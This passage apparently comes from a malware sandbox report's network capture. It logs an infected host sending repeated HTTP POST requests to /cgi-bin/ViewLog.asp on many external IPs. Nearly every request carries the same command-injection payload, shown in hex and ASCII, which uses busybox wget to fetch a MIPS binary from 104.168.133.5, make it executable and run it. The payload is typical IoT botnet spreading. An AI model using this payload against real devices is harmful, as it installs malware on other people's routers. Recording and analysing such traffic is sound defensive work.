                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              214192.168.2.135261831.136.163.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.282798052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:02.854589939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:03.974555969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:06.438555002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:11.046636105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:20.006511927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.926441908 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:14.790385962 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              215192.168.2.133692894.121.151.1488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.320801973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              216192.168.2.135519094.122.0.2318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.785188913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              217192.168.2.135994231.136.97.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.969141006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:04.550684929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.670661926 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.974611044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.582552910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:21.542521000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:39.974459887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:16.838485956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              218192.168.2.134589294.126.57.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.978511095 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:04.172755957 CET558INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:04 GMT
                                              Server: Apache
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 52 69 63 68 69 65 73 74 61 20 69 6e 6f 70 70 6f 72 74 75 6e 61 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 52 69 63 68 69 65 73 74 61 20 69 6e 6f 70 70 6f 72 74 75 6e 61 3c 2f 48 31 3e 0a 4c 61 20 72 69 63 68 69 65 73 74 61 20 73 63 72 69 70 74 20 6e 6f 6e 20 c3 a8 20 76 61 6c 69 64 61 2e 20 20 4c 6f 20 73 63 72 69 70 74 20 6e 6f 6e 20 c3 a8 20 65 73 65 67 75 69 62 69 6c 65 2e 0a 3c 50 3e 49 6e 6f 6c 74 72 65 2c 20 65 72 72 6f 72 65 20 34 30 34 20 4e 6f 6e 20 74 72 6f 76 61 74 6f 0a 72 69 73 63 6f 6e 74 72 61 74 6f 20 64 75 72 61 6e 74 65 20 69 6c 20 74 65 6e 74 61 74 69 76 6f 20 64 69 20 75 74 69 6c 69 7a 7a 61 72 65 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 70 65 72 20 67 65 73 74 69 72 65 20 6c 61 20 72 69 63 68 69 65 73 74 61 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>400 Richiesta inopportuna</TITLE></HEAD><BODY><H1>Richiesta inopportuna</H1>La richiesta script non valida. Lo script non eseguibile.<P>Inoltre, errore 404 Non trovatoriscontrato durante il tentativo di utilizzare ErrorDocument per gestire la richiesta.</body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              219192.168.2.134322295.89.85.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:03.990746021 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              220192.168.2.134568095.183.109.2428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:04.812414885 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.051963091 CET75INHTTP/1.1
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              221192.168.2.133758894.122.18.2508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:04.812494040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              222192.168.2.133911062.29.10.2328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:04.812552929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              223192.168.2.134073831.136.143.898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:05.219868898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
